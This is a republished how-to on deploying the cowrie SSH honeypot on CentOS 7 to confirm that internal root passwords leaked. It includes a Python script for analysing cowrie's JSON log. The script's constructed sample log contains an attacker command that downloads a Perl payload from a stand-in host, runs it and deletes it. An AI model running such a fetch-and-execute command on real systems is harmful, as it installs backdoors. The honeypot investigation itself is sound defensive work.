2025-03-29 Update From: SLTechnology News&Howtos (Network Security)
Shulou(Shulou.com)06/01 Report--
Background
Recently a number of our servers were hacked, a large number of them, with serious impact. Basically our servers have firewall policies and the passwords are complex too, so at present we have no particularly good lead to troubleshoot from (we had not done any log collection or prepared any means in advance, so there is little that can be done after the fact; worse, the hacked machines basically had their system commands replaced, which means the output of ls, ps, netstat and the other tools on those hosts cannot be trusted, leaving even less to work with).
While going through the hacked servers we found that the firewall of one of them was turned off (maybe the attacker turned it off, maybe it had always been off). Lacking a better lead, we worked from the hypothesis that this server was compromised first because its firewall was off, and was then used as a springboard to compromise the other machines one after another. If this hypothesis holds, it means our commonly used passwords have been harvested by outsiders. To test the hypothesis we need some tooling, and an SSH honeypot is the best way to get evidence. There are many SSH honeypots; after some review we chose cowrie, not because it is necessarily the best of its kind, but because a look at GitHub shows it is still actively updated, whereas several of the others had their last commit years ago.
Cowrie introduction
http://www.cowrie.org/ is the official website; frankly the page is poor, with very little to see and what there is well hidden.
https://github.com/cowrie/cowrie is the GitHub repository where the code is hosted, and its content is fine.
What we need this time is an SSH honeypot. Simply put, a program simulates an SSH service on a port so that an attacker takes it for a real SSH server, and the honeypot then records the related information: the source IP, the account and password used to log in, what was done after logging in, and so on.
Cowrie has rich integrations: it can feed MySQL, ELK and other systems for detailed analysis of attacker data. This article only uses cowrie to verify our compromise case, so it covers only the most basic, practical setup and does not go into the integration with third-party systems for now.
Cowrie installation
The installation instructions are also a bit hidden: they are not shown when you open the GitHub repository page, and you have to open the INSTALL.md file in the repository yourself, at https://github.com/cowrie/cowrie/blob/master/INSTALL.md.
According to the official guide the installation environment is Ubuntu, while our environment is CentOS 7.0, but the steps are much the same. The concrete steps and commands we used are pasted below; only part of the official procedure was followed, not all of it.
Install and configure cowrie
# install git, python-virtualenv (the Python sandbox cowrie runs in), gcc and the development headers that cowrie's Python dependencies compile against
yum install -y git python-virtualenv bzip2-devel libffi-devel gcc
# upgrade nss/curl/libcurl first, otherwise the git clone over https below may fail on an old CentOS 7.0 image
yum update -y nss curl libcurl
# create a dedicated cowrie user to run the honeypot instead of using root directly, which is safer (cowrie's start script also refuses to run as root)
adduser cowrie
passwd cowrie
# enter the password, then switch to the cowrie account
su - cowrie
# pull down the cowrie code from GitHub
git clone https://github.com/cowrie/cowrie
# enter the cowrie directory after success
cd cowrie
# cowrie runs inside a Python virtualenv sandbox. At the time of writing it supported both Python 2 and Python 3, and CentOS 7.0 ships Python 2.7 by default, so we initialise the virtualenv with 2.7. Note that current cowrie releases require Python 3; on a fresh install use --python=python3 and check the project's INSTALL.md for the supported version.
virtualenv --python=python2 cowrie-env
# activate the virtualenv
source cowrie-env/bin/activate
# update pip first
pip install --upgrade pip
# after updating pip, install the Python libraries cowrie depends on. Some of them build C extensions, which is why gcc and the -devel packages were installed above.
pip install --upgrade -r requirements.txt
# if all goes well, create the cowrie configuration file and the simulated SSH root account
# We use the default configuration file, in which the simulated SSH service listens on port 2222. Changing it to 22 directly needs extra work: cowrie runs as an unprivileged user, and binding a port below 1024 requires root (or CAP_NET_BIND_SERVICE). So we keep the default 2222 and use an iptables redirect to forward port 22 to 2222, which is simpler.
cp etc/cowrie.cfg.dist etc/cowrie.cfg
# create the simulated SSH account file. Because we want to verify that our internal password has leaked, we list only the root passwords we suspect were leaked: these are the only passwords the honeypot will accept, so any successful login is itself evidence of the leak.
vim etc/userdb.txt
# the contents are as follows, one user:uid:password entry per line (the file also supports wildcards, regular expressions and deny rules, which we do not use here; see etc/userdb.example in the repository):
root:x:suspected-leaked-password-1
root:x:suspected-leaked-password-2
root:x:suspected-leaked-password-3
# once configured, start cowrie
bin/cowrie start
# after it starts, use the following command to see the running process; stop shuts cowrie down
bin/cowrie status
Configure firewall policy
# cowrie is now running; the next step is to forward SSH port 22 to the honeypot's port 2222. Before that, move the real SSH service from port 22 to another port, e.g. 7997. Keep your current SSH session open until the new port is confirmed to work, or you can lock yourself out of the box.
vim /etc/ssh/sshd_config
# modify the port line
Port 7997
# with SELinux enforcing, sshd may only bind the ports labelled ssh_port_t, so restarting sshd on the new port fails. We simply disabled SELinux; the cleaner fix is to label the new port instead (requires policycoreutils-python):
semanage port -a -t ssh_port_t -p tcp 7997
# or, as we did, switch SELinux to permissive for this session (not persistent across reboot, and it weakens the host)
setenforce 0
systemctl restart sshd
# open the real SSH port, and ports 22 and 2222 so the outside world can reach the honeypot. Note that -A appends; if the INPUT chain ends with a REJECT rule, as the CentOS default ruleset does, use -I instead so the rules land before it.
iptables -A INPUT -p tcp --dport 7997 -j ACCEPT
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --dport 2222 -j ACCEPT
# last step: redirect inbound connections to port 22 to port 2222
iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222
Test
# now verify that cowrie is serving SSH: from another host, connect to the honeypot
ssh root@<cowrie address>
# enter a password that is not in userdb.txt: a login failure is the expected result
# enter one of the passwords listed in userdb.txt: if you get a shell, the honeypot works and its logs can be analysed
The cowrie running log is placed inside the cowrie directory at var/log/cowrie. By default there are two formats: cowrie.log is the ordinary text log, and cowrie.json holds the same events as one JSON object per line, which is the one to feed into scripts or ELK. After running it for only one night, the problem was immediately visible in the log.
The log showed that an outside attacker had successfully logged in with one of our internal passwords, and the string of commands that followed is what they did after logging in: download a backdoor program, run it and delete it, which matches what we expected.
Cowrie also keeps a copy of every file the attacker downloaded (here the .pl files), stored under the cowrie directory at
var/lib/cowrie/downloads/2438c584311c439b585075c68c443e2e96b43a826aaf42643d7808d436df3731
(the file name is the SHA-256 of the contents, so the same sample fetched in several sessions is stored once).
The recordings of what was typed on the command-line terminal are placed under the cowrie directory at
var/lib/cowrie/tty/1b54104347e987372b323bc6701625889cc01b8de2ce13bc9a297f1f620b5140
and can be replayed with bin/playlog.
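As an added example for this article (not cowrie's own code), here is a small Python script that ties the userdb.txt step above to the log analysis: it reads cowrie.json and reports, per session, which of the suspected passwords was actually accepted, from which source IP, and what was typed and downloaded in that session, alongside a count of the failed guesses so the real hit stands out from the background noise. The field names (eventid, src_ip, session, username, password, input, url, shasum) follow cowrie's JSON output; the log lines embedded in the script are constructed to resemble the night described above and are not a real capture, and the password strings are the placeholders used in this article. Run it with the path to the real var/log/cowrie/cowrie.json to use it on the honeypot.

```python
"""Find which suspected-leaked passwords the cowrie honeypot accepted.

Added example for this article, not part of cowrie. Reads cowrie.json
(one JSON object per line) and, per session, reports successful logins
that used one of our suspected passwords together with the commands typed
and files downloaded in that session.
"""
import json
import sys
from collections import Counter, defaultdict

# The passwords we listed in etc/userdb.txt (placeholders, as in the article).
SUSPECTED_PASSWORDS = {
    "suspected-leaked-password-1",
    "suspected-leaked-password-2",
    "suspected-leaked-password-3",
}

# Constructed sample of cowrie.json, not a real capture. Field names follow
# cowrie's JSON output; the IPs are RFC 5737 documentation addresses.
SAMPLE_COWRIE_JSON = r"""
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","timestamp":"2019-06-01T02:11:05.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","username":"root","password":"123456","timestamp":"2019-06-01T02:11:06.000000Z"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","username":"root","password":"suspected-leaked-password-2","timestamp":"2019-06-01T02:11:08.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","input":"cd /tmp; wget http://203.0.113.9/x.pl; perl x.pl; rm -f x.pl","timestamp":"2019-06-01T02:11:09.000000Z"}
{"eventid":"cowrie.session.file_download","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","url":"http://203.0.113.9/x.pl","shasum":"0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef","timestamp":"2019-06-01T02:11:10.000000Z"}
{"eventid":"cowrie.session.closed","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","timestamp":"2019-06-01T02:11:12.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.77","session":"0f0f0f0f0f0f","username":"root","password":"toor","timestamp":"2019-06-01T03:40:01.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.77","session":"0f0f0f0f0f0f","username":"admin","password":"admin","timestamp":"2019-06-01T03:40:02.000000Z"}
"""


def parse_events(text):
    """Parse one JSON object per line. Blank or truncated lines (for example a
    partial last line while cowrie is still writing) are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def group_sessions(events):
    """Group events by cowrie session id, preserving file order."""
    sessions = defaultdict(list)
    for ev in events:
        sessions[ev.get("session")].append(ev)
    return sessions


def leaked_password_logins(events, suspected=SUSPECTED_PASSWORDS):
    """Return one record per successful login that used a suspected password,
    with everything typed and downloaded in the same session."""
    hits = []
    for session_id, evs in group_sessions(events).items():
        for ev in evs:
            if ev.get("eventid") != "cowrie.login.success":
                continue
            if ev.get("password") not in suspected:
                continue
            hits.append({
                "session": session_id,
                "src_ip": ev.get("src_ip"),
                "username": ev.get("username"),
                "password": ev.get("password"),
                "commands": [e["input"] for e in evs
                             if e.get("eventid") == "cowrie.command.input"],
                "downloads": [(e.get("url"), e.get("shasum")) for e in evs
                              if e.get("eventid") == "cowrie.session.file_download"],
            })
    return hits


def failed_attempts(events):
    """Count failed (username, password) guesses: the background noise."""
    return Counter((e.get("username"), e.get("password")) for e in events
                   if e.get("eventid") == "cowrie.login.failed")


def report(text, suspected=SUSPECTED_PASSWORDS):
    """Print a summary and return the hits for further processing."""
    events = parse_events(text)
    hits = leaked_password_logins(events, suspected)
    print("failed attempts (username, password) -> count:")
    for (user, pw), n in failed_attempts(events).most_common():
        print("  %s / %s: %d" % (user, pw, n))
    print("successful logins with a suspected leaked password: %d" % len(hits))
    for h in hits:
        print("  session %s from %s as %s with %r"
              % (h["session"], h["src_ip"], h["username"], h["password"]))
        for cmd in h["commands"]:
            print("    cmd: %s" % cmd)
        for url, sha in h["downloads"]:
            print("    download: %s -> var/lib/cowrie/downloads/%s" % (url, sha))
    return hits


if __name__ == "__main__":
    # Usage: python check_cowrie_json.py [path/to/cowrie.json]
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as f:
            report(f.read())
    else:
        report(SAMPLE_COWRIE_JSON)
```

Each hit names the password that was accepted, which is the actual evidence for the hypothesis: a single cowrie.login.success carrying one of the userdb.txt passwords from an outside IP means that password is in circulation, regardless of how many failed guesses surround it.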